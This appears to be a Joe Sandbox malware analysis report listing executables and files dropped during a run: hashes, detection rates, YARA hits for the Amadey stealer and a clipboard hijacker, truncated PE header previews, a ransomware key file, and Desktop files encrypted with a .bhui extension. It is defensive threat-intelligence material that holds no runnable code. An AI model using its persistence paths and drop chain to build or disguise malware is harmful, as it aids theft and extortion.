SSDEEP:	12288:JFu1Aol4oRVL+O4wI6pig+Nz0a1DMyw0Se1bf0dcF4nRtInoTV0PYEoNSAiyGYKH:a1A/AVqHU63DSI7F4vIoB0LoNSAnGBb
MD5:	975AFF0E2D4CC02478D7ED11A94354FD
SHA1:	27C50BCACD22867323774CEA8EDF1AF8852A13B7
SHA-256:	102DFB05D9EB0F0083048CACEE05E7F84B5D7D2EAA49D52891C7407ABD3D71D6
SHA-512:	5C1A3F58A860A0AF062FEF663A8DDC946E27F23FB96B3B29DCD020DA07A1AF9549C17031976E082A0232FA97AF44DE3CA4B391AA2600717EDCDD12550489EBA2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........B...B...B...\.E.S...\.T.h...\.S.....e...K...B.......\.Z.C...\.D.C...\.A.C...RichB...........PE..L...%ngb......................P......[............@...........................Z......}..........................................d....pX.......................Z......................................2..@............................................text............................... ..`.data....dN......>..................@....rsrc........pX......*..............@..@.reloc..(O....Z..P...,..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E9C7.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	515584
Entropy (8bit):	7.7141311012994525
Encrypted:	false
SSDEEP:	12288:rkkrV2zs/QAlY5r/6iXhoqY8GEach8u/:rk7zs/PgL6iXhoqYMa68u/
MD5:	24833AE45941208CDC9CA1C15F90F43E
SHA1:	7E08265ACB64592AFD809BA7CEDBCBED550197A8
SHA-256:	6C4394CCA61F5B6BD3165559A662F7CA574F65E165A1AF4B72609749662ADE57
SHA-512:	BA87082E63E1C598EBAC5DCC421D81A2B4AF94472538F08E156F2024D177377FAC5AB6B3D11FD1D0556092E14B96B433CF31FADAC58E4CD1C1ED6A56150C0B03
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....i...i...i.......i....3.i....e.i.$>....i...h...i......i.......i.......i.Rich..i.........................PE..L...,..b............................n\............@.................................W...........................................d........z......................0...0................................2..@............................................text...B........................... ..`.data...`........@..................@....rsrc....z.......\|...>..............@..@.reloc...".......$..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F09E.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	796672
Entropy (8bit):	7.825539770742405
Encrypted:	false
SSDEEP:	12288:USE30OgjpRS5tgX60lgX9V4h7FBVbOxyp8tgzW2bfJLxMks:A30OgjpAUKYpRBWWzW2zEk
MD5:	836FDB5D06415C4815B4962D5C5316A5
SHA1:	E353907271F8192C1B27019B416A2D8405BF4376
SHA-256:	6D30A028003763CC6DEA64EFA67B8CE750E489434BA44EE8C156CF3941F546E1
SHA-512:	D469CF354FD0EDE245FB2EB98890866114E5617961E9A2C9D8FB9200FA4E36E84009F8BEA88240FC52705A19E0BC9869BA23278B9654C015E8C6261364372373
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....i...i...i.......i....3.i....e.i.$>....i...h...i......i.......i.......i.Rich..i.........................PE..L......a.................h...`....................@..................................d.......................................i..d....@...z...................... ....................................?..@...............0............................text...pf.......h.................. ..`.data...h............l..............@....rsrc....z...@...\|..................@..@.reloc...%.......&..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F86F.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4531200
Entropy (8bit):	7.888380542499624
Encrypted:	false
SSDEEP:	98304:jUu64pByjFQ/1m2L4PkWjvsj9cSFzIcNO:TByJqm7Yc2zf
MD5:	4E40E00BE3370FB1F562B1E09E1275C1
SHA1:	083D017B2A7D25E643FFB14E81A49AFCC5E27470
SHA-256:	8A2E061B3B38DFF83F62982A6B0087E5C4EA1C47192BF0AC2F8F67397636B164
SHA-512:	94C7B158B3300B5AFA9128F30B62946775698E4C33518BDA2369A8737685F4016BC6C033F0096238876C909260A7FE92B1D79C953E357D1BBFB3BF9A950CF082
Malicious:	true
Yara Hits:	Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\F86F.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.d..................E..........8E.. ...@E...@.. ........................E...........@.................................P8E.K....@E......................`E...................................................... ............... ..H............text.....E.. ....E................. ..`.rsrc........@E.......E.............@..@.reloc.......`E......"E.............@..B.................8E.....H........"E.\............'....D..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,

C:\Users\user\AppData\Local\Temp\XandETC.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\D5B9.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	3890176
Entropy (8bit):	7.902408557753204
Encrypted:	false
SSDEEP:	49152:8Pu803iSM2N7aUjjqpEbUS2qv5MQBsSY/b7KoiTFUgxylC42lVJpiU71PP:s12BEE4vqxMQzub7OTFUgxylqTiU7J
MD5:	3006B49F3A30A80BB85074C279ACC7DF
SHA1:	728A7A867D13AD0034C29283939D94F0DF6C19DF
SHA-256:	F283B4C0AD4A902E1CB64201742CA4C5118F275E7B911A7DAFDA1EF01B825280
SHA-512:	E8FC5791892D7F08AF5A33462A11D39D29B5E86A62CBF135B12E71F2FCAAA48D40D5E3238F64E17A2F126BCFB9D70553A02D30DC60A89F1089B2C1E7465105DD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 73%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Bu.c...............&.....X;................@..............................;.....!.;...`... ...............................................8.......9.......8...............;...............................8.(...................D.8..............................text...............................`..`.data.....7.......7.................@....rdata........8.......8.............@..@.pdata........8.......8.............@..@.xdata........8.......8.............@..@.bss....8.....8..........................idata........8.......8.............@....CRT....h.....8.......8.............@....tls..........9.......8.............@....rsrc.........9.......8.............@....reloc........;......Z;.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aafg31.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\D5B9.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	427520
Entropy (8bit):	6.066435526816269
Encrypted:	false
SSDEEP:	6144:iy9R7sQLwcYHMooiT4MKBz3ImJmGerEhgVIXFML:i+ZUcOTVrKiAZerLIX
MD5:	B64DE8CDC8E3266F695C59918CF0075C
SHA1:	3E805FD4B7309F302D119CD1CFEB821D6CFE68EE
SHA-256:	E911A3333AD6FBC013DBDF335FCFE7A5A7D383BE90D3FD18C9B3F99B21CF4501
SHA-512:	DAE064BB8C60BCB80D0D2C407566F17B500D0B556F50A608C0EB565A1485A9E4D18F590A143C06F982E3E5AFA8FA2AD4BC7A0AA2D9DE4A096448531351273158
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 35%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S%.[2K.[2K.[2K.RJ..Y2K.RJ..A2K.RJ..~2K.[2J..0K.RJ..B2K.RJ..q2K.RJ..Z2K.RJ..Z2K.Rich[2K.........PE..d.....[J..........".......................................................................@.......... ......................................(E..\|....P...A......T9..............X...L...8...............................................P....C.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata..T9.......:..................@..@.rsrc....A...P...B...>..............@..@.reloc..X...........................@..Bk.[J....+.[J......[J....+.[J......[J......[J....+.[J......[J....+.[J....+.[J....T.[J....Y.[J......[J......[J....g.[J+.......8...'.[J@.....[JK...%.[JW...f.[Ja...5.[Jm.....[Jx...........ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.GDI32.dll.USER32.dll.msvcrt.dll.SHELL32.dll.SHLWAPI.

C:\Users\user\AppData\Local\Temp\oldplayer.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\D5B9.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	202752
Entropy (8bit):	6.344899274055935
Encrypted:	false
SSDEEP:	3072:lWgR9+o+G2K47yLk6E9EzwHxFTTDYUSNt2kLu5gf7or7wy+wXRcWfnPjt:lWu+5a4ukZSwH/TT2NE4u5gTovv
MD5:	A64A886A695ED5FB9273E73241FEC2F7
SHA1:	363244CA05027C5BEB938562DF5B525A2428B405
SHA-256:	563ACABE49CC451E9CAAC20FAE780BAD27EA09AAEFAAF8A1DFD838A00DE97144
SHA-512:	122779AD7BCE927E1B881DF181FCC3181080D3929A67F750358FA446A21397B998D167C03AED5F3BDC3CD7A1F17E4DA095F9B4A9367C6357CABEFCF8CDD29474
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L....+.d.................Z..........o;.......p....@..........................`............@.....................................d.... .......................0..p ..`...p...................t...........@............p...............................text....Y.......Z.................. ..`.rdata..t\|...p...~...^..............@..@.data...h$..........................@....rsrc........ ......................@..@.reloc..p ...0..."..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\bowsakkdestx.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	559
Entropy (8bit):	6.004259360523156
Encrypted:	false
SSDEEP:	12:YGJ68UMQMuFhwufi+Cv2OHbW2/lBtrYrHw0J/6X+yN55z:YgJURMChni1v2OHbWGls6X+yzh
MD5:	E085EE40110A62687426D9912F76BA0A
SHA1:	570129022D1257B25E4E41179B1FCE484E35E173
SHA-256:	249D09D2B2F601F13AEC42E8C656C5612F0400477C724CB6E8A6D26EEC845D57
SHA-512:	F3088B4637A73FF917318930CB9F69FA7CF9ACB2924E8A001C20A502461DED42A2BE035BF16792274A2F5486539544CFE2C1EE1A997623788545195CAB7ACD4F
Malicious:	false
Reputation:	unknown
Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz6fKeRUzAuT51Jzl25x1\\n6rIH8kP+Za9iV6o7RJzhAukJBNh9iYpD3z0BRtUYY7G4lSqjMRJHR1eReiKKJE5D\\nwyflo\/4NUlBJ5QA4zFAamyP3ajU0BVX3dse65p5r7K7wALsdMLsXg+x8YRkQSBVr\\nQPROSOgYJZmDe+9g5QdWb40\/vPP+oKyceFvfPiWyf6tzEwOzihxGQDJ1ZghRh3Si\\nFMLoHm8blxwJ3u3xq6lhIsaZNJ1aX\/RbynaXSz6NU3VpFSgC00CoYAYPHcVY6aWe\\nj+iMeY\/mLAYeK\/rE8JZxbksETfAU3HEiN7S7k6clRlzwmkVfSwE6epDUR4dzTQUF\\nYQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT"}

C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348672
Entropy (8bit):	7.184133278122481
Encrypted:	false
SSDEEP:	6144:Rre2Ofp8rQ5BJiHnx/PFy0nrFh4QtcOE1+GayRx9K4o78EZm:Ri1f+8jJSty07sp7HJ+
MD5:	B7133C4070082747C60BF6191A5F70DE
SHA1:	A7568A93D9DC79A211270736C5989C5F6635E9B6
SHA-256:	A96E080EE195FB2333191FB38C7A66E0C0BD029AF6480DC489A8C8113E5B03A9
SHA-512:	F3DD85289894E9DDFD61D1D5B5CB479B97D7E0759327236B72150D22B790A2492BD4929D8427AAC50B48ED6E7E18ABCCBE401CB7D5F5DEB683E8C813AFBB72FE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e..e!.6!.6!.6..'6 .6N.!65.6N..6N.6N..6..6(.,6".6!.6].6N..6 .6N.%6 .6N."6 .6Rich!.6........................PE..L...i..c.................>....t......R.......P....@..........................`u.............................................DB..(....`t.x............................................................4..@............................................text....<.......>.................. ..`.data...8.r..P.......B..............@....wida........@t......>..............@....rsrc...x....`t......V..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.3362059272001
Encrypted:	false
SSDEEP:	192:9UEc8b6H1LE+4LoGgMatAJ2lzUw317NyEpvNHhqyo:9UUE1BYoGza/D3170kiyo
MD5:	9EAD10C08E72AE41921191F8DB39BC16
SHA1:	ABE3BCE01CD34AFC88E2C838173F8C2BD0090AE1
SHA-256:	8D7F0E6B6877BDFB9F4531AFAFD0451F7D17F0AC24E2F2427E9B4ECC5452B9F0
SHA-512:	AA35DBC59A3589DF2763E76A495CE5A9E62196628B4C1D098ADD38BD7F27C49EDF93A66FB8507FB746E37EE32932DA2460E440F241ABE1A5A279ABCC1E5FFE4A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................o......o......Rich...........................PE..L......a.....................................0....@..........................`............@..................................:..<............................P..,....9..8............................................0..0............................text............................... ..`.rdata.......0......................@..@.data...`....@......................@....reloc..,....P......."..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\759F.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	796672
Entropy (8bit):	7.825539770742405
Encrypted:	false
SSDEEP:	12288:USE30OgjpRS5tgX60lgX9V4h7FBVbOxyp8tgzW2bfJLxMks:A30OgjpAUKYpRBWWzW2zEk
MD5:	836FDB5D06415C4815B4962D5C5316A5
SHA1:	E353907271F8192C1B27019B416A2D8405BF4376
SHA-256:	6D30A028003763CC6DEA64EFA67B8CE750E489434BA44EE8C156CF3941F546E1
SHA-512:	D469CF354FD0EDE245FB2EB98890866114E5617961E9A2C9D8FB9200FA4E36E84009F8BEA88240FC52705A19E0BC9869BA23278B9654C015E8C6261364372373
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....i...i...i.......i....3.i....e.i.$>....i...h...i......i.......i.......i.Rich..i.........................PE..L......a.................h...`....................@..................................d.......................................i..d....@...z...................... ....................................?..@...............0............................text...pf.......h.................. ..`.data...h............l..............@....rsrc....z...@...\|..................@..@.reloc...%.......&..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Download File

Process:	C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.3362059272001
Encrypted:	false
SSDEEP:	192:9UEc8b6H1LE+4LoGgMatAJ2lzUw317NyEpvNHhqyo:9UUE1BYoGza/D3170kiyo
MD5:	9EAD10C08E72AE41921191F8DB39BC16
SHA1:	ABE3BCE01CD34AFC88E2C838173F8C2BD0090AE1
SHA-256:	8D7F0E6B6877BDFB9F4531AFAFD0451F7D17F0AC24E2F2427E9B4ECC5452B9F0
SHA-512:	AA35DBC59A3589DF2763E76A495CE5A9E62196628B4C1D098ADD38BD7F27C49EDF93A66FB8507FB746E37EE32932DA2460E440F241ABE1A5A279ABCC1E5FFE4A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................o......o......Rich...........................PE..L......a.....................................0....@..........................`............@..................................:..<............................P..,....9..8............................................0..0............................text............................... ..`.rdata.......0......................@..@.data...`....@......................@....reloc..,....P......."..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\rrjthgj

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	207872
Entropy (8bit):	6.935000051693485
Encrypted:	false
SSDEEP:	3072:fUBZWKxWYm3UvpGlXniBnpvxh+KKEI4NR6Qbnh:M2K8Yhp6X6hVxIVQT
MD5:	22DB1211AD126909ED458BAA3BC4C424
SHA1:	614F8A0C23210F5A83854262042425C511A99999
SHA-256:	0E2BF57A9ED2F7AC44D5A2C551AB8A88A677E59A894DADCE533FC2F92C6F7686
SHA-512:	2B32EA4262CFCD714B8508004CD7BAD39369F38FC0B8AB9B914B890465E22494D9C8A90D71F62867956A8C1A0DA859CD8FDEC4F340C3464D2FA06CED73D8BBB9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 46%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....i...i...i.......i....3.i....e.i.$>....i...h...i......i.......i.......i.Rich..i.........................PE..L....-.a.................J..........~\.......`....@.................................c$.......................................M..d....P...z......................4...0................................2..@............................................text...BH.......J.................. ..`.data...`....`...@...N..............@....rsrc....z...P...\|..................@..@.reloc... ......."..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\rrjthgj:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\wujthgj

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	205824
Entropy (8bit):	6.931250470043805
Encrypted:	false
SSDEEP:	3072:J4BPQ70VHgRVgdytD1rtn6ZQax9x7XiQPuhNR6aHInh:OhdHgRVs+D5k6aJimtaHu
MD5:	B1C532EE300B4D54DC95FA6DE7406870
SHA1:	364A17284E19AFDCE1D3C198448301CCBDAC59B7
SHA-256:	BE85B76A48B35552D8339B383CCD2B27B3A685370DEE6B466EA79C580E1DB68E
SHA-512:	C6E4A191AFC783CDEB5DD5ADDF5E183898C1A249E2EA243961C92DEED85D649D594790033F6ABDC76B75DE3B504AC7DC086D77EDDF6EA96E7F5CEB438DA06828
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....i...i...i.......i....3.i....e.i.$>....i...h...i......i.......i.......i.Rich..i.........................PE..L...K..b.................B..........~\.......`....@.........................................................................pF..d....P...z......................@...0................................2..@............................................text...2A.......B.................. ..`.data...`....`...@...F..............@....rsrc....z...P...\|..................@..@.reloc... ......."..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\CZQKSDDMWR.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845754117394356
Encrypted:	false
SSDEEP:	24:az1qyOHIdPYVY3xkDABrJgLHNP65U98LYxinoysDImj+h0WbD:aRqFodP4YBu2JgLHN48YnohDNCrD
MD5:	262BB17721476986DE3366E44097F626
SHA1:	B9858872C6004CDAAD4671D13D746C2736BBC116
SHA-256:	B923ED8D9CDAA2C2EAB9F13043297DB7AB31F8DA4E984B79D93B6AA0263B5B50
SHA-512:	A8AB54CBF0C21AF8BA06620449918A1ED7E4940290D56116B64105FD2237CBB197F1FDBFD3A89130BCB422D0058C6E62D2BA4C1C7CDD4E65FB6BE7C4F33F367D
Malicious:	true
Reputation:	unknown
Preview:	CZQKS.O..nX..L......SB.......5..So.\|zt....<.j#r.j>e.o..."..,....,.xq.c.5.K.W..=s...U.F.b..b..F.'...z....o+...`..l..<..+.q...R.7....{.5hS....^S...!.a...j.._..ZpX..h%....1b3/.....,..21.~T..#...of......!\.V..y.R..J...).A.EH...e.....wW..s.h......I...T..$...d.K.....8=..[......o.4;9.W....m.Y...k~.23.....N..k..F.....A..u`ClZ..G....(....vR.....,T..1.....@...i\|.\|...g..m.....a...........).m..x.......B....s.).......:.><9Hv....v.....:...H%8.[...cG+......B.........~W.G,O...2.....KD../. .is...O.....`.0...%.T..)..B.........5.:..y!...}......-..&...J.. .SOh. .jYg.b..,.1.\|.C...=..q.HP....cw=...A...[......&7!.Q.P...m.A.Y.K.i.%#m..qT7.....)..!m..bJ...s.QF.3.S.\|En.OEV..B.T.r.D.UaT.... AO.U.v...(..K..J.K...h.......+..8....Jq.Kk...u C#.. J......>o?..Zl....:o..aUv...rM..Q.xK.a.R....Vi_...,.n..q....p.G....#...f....6..8.6(..J.Y.=B....`W../`~h.O....z..n....b..P0wi..t?6T..M..2...1wEyC....m.r.k........aEj.....&.n'".N..e.r.@x"a.....*...r....1.8..{"......9...850

C:\Users\user\Desktop\CZQKSDDMWR.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845754117394356
Encrypted:	false
SSDEEP:	24:az1qyOHIdPYVY3xkDABrJgLHNP65U98LYxinoysDImj+h0WbD:aRqFodP4YBu2JgLHN48YnohDNCrD
MD5:	262BB17721476986DE3366E44097F626
SHA1:	B9858872C6004CDAAD4671D13D746C2736BBC116
SHA-256:	B923ED8D9CDAA2C2EAB9F13043297DB7AB31F8DA4E984B79D93B6AA0263B5B50
SHA-512:	A8AB54CBF0C21AF8BA06620449918A1ED7E4940290D56116B64105FD2237CBB197F1FDBFD3A89130BCB422D0058C6E62D2BA4C1C7CDD4E65FB6BE7C4F33F367D
Malicious:	false
Reputation:	unknown
Preview:	CZQKS.O..nX..L......SB.......5..So.\|zt....<.j#r.j>e.o..."..,....,.xq.c.5.K.W..=s...U.F.b..b..F.'...z....o+...`..l..<..+.q...R.7....{.5hS....^S...!.a...j.._..ZpX..h%....1b3/.....,..21.~T..#...of......!\.V..y.R..J...).A.EH...e.....wW..s.h......I...T..$...d.K.....8=..[......o.4;9.W....m.Y...k~.23.....N..k..F.....A..u`ClZ..G....(....vR.....,T..1.....@...i\|.\|...g..m.....a...........).m..x.......B....s.).......:.><9Hv....v.....:...H%8.[...cG+......B.........~W.G,O...2.....KD../. .is...O.....`.0...%.T..)..B.........5.:..y!...}......-..&...J.. .SOh. .jYg.b..,.1.\|.C...=..q.HP....cw=...A...[......&7!.Q.P...m.A.Y.K.i.%#m..qT7.....)..!m..bJ...s.QF.3.S.\|En.OEV..B.T.r.D.UaT.... AO.U.v...(..K..J.K...h.......+..8....Jq.Kk...u C#.. J......>o?..Zl....:o..aUv...rM..Q.xK.a.R....Vi_...,.n..q....p.G....#...f....6..8.6(..J.Y.=B....`W../`~h.O....z..n....b..P0wi..t?6T..M..2...1wEyC....m.r.k........aEj.....&.n'".N..e.r.@x"a.....*...r....1.8..{"......9...850

C:\Users\user\Desktop\GLTYDMDUST.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.873063526199098
Encrypted:	false
SSDEEP:	24:0wKSH5juRvDOVwKXMTeIkdlPD4nsxKyrp+KG7JxjOHTB7jP0DEzsoXaw+Enk5dmQ:HKuKRvZpePT74npC+KGf6HT9IDroXzkT
MD5:	DA672E2F2B008FC483DF1C700B2B572E
SHA1:	CF41EC322595EFB8B6920B9E9F996E884B65B8A4
SHA-256:	0C52A58886E67E9CC694E3EEB44D1B323C155722A684E34B0D5F5A30689D4363
SHA-512:	CD91290CC47016EF3F508A1FF824A6D6AA93A01622D6F0EA1A239B77A9D9DAA93E4D05A89B924DE88409D1187A6180111711608E38D9C9A905E8E91898BC1CF4
Malicious:	false
Reputation:	unknown
Preview:	GLTYD.TD...g9jirwf....]b..t.s.........+r.......o.-....X....k@.....?x...........).u!.}.O'..g....;.......8.N(..ZI.../.W.`./.T.<..e.!L.#.....:.,...k..:...."..v.R...^6w..o$u"......Q.....d...i\..y..?P...+{T..1./o......F.2...6....E..~.Z.H@..G.{...o. c.$...fJh`i4.....L.?....a.H-k..MS8.r..Ah.z..)b?F...3...h..Y.<=+..hy.9U.1.. .....b.....@...M....4.....y._.s..\|..?1....7.<\=.s..f....T"..qk&C...'.@R.#...i#G...~]U..o.+....:.._..'.bx..............%^8].......uz.\|.%.s .......6'Y\.....\...6..`Y...H.yu.W.#.1.e.Ur0..K.Kh...)<..e.QN......sX....6.z...X.l.}..4..>...t..`...I{.W.(bK...e].'Y.".w..T.q3....$&J.....R3(..Zu.....%1.....b.L8iQan...].Q..w..F......h....Q4.....!~:MZ~.g]....(.0...P......8....>.,.K.......Q.........V_..T..I..j.bx+.g......}Uw....FoYU~Rh.).{..W.^..j.6S1-.C...O..d....+.,.....;.&.....J...9..ik)I.f...d....-..V.Wy].[s....(..H..~ .s..3./.......\....&.x$..A..4..q.~G...s.w.,....F`..7)>...b...-...dj.7...\|...............hs9.`.V<.....

C:\Users\user\Desktop\GLTYDMDUST.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.873063526199098
Encrypted:	false
SSDEEP:	24:0wKSH5juRvDOVwKXMTeIkdlPD4nsxKyrp+KG7JxjOHTB7jP0DEzsoXaw+Enk5dmQ:HKuKRvZpePT74npC+KGf6HT9IDroXzkT
MD5:	DA672E2F2B008FC483DF1C700B2B572E
SHA1:	CF41EC322595EFB8B6920B9E9F996E884B65B8A4
SHA-256:	0C52A58886E67E9CC694E3EEB44D1B323C155722A684E34B0D5F5A30689D4363
SHA-512:	CD91290CC47016EF3F508A1FF824A6D6AA93A01622D6F0EA1A239B77A9D9DAA93E4D05A89B924DE88409D1187A6180111711608E38D9C9A905E8E91898BC1CF4
Malicious:	false
Reputation:	unknown
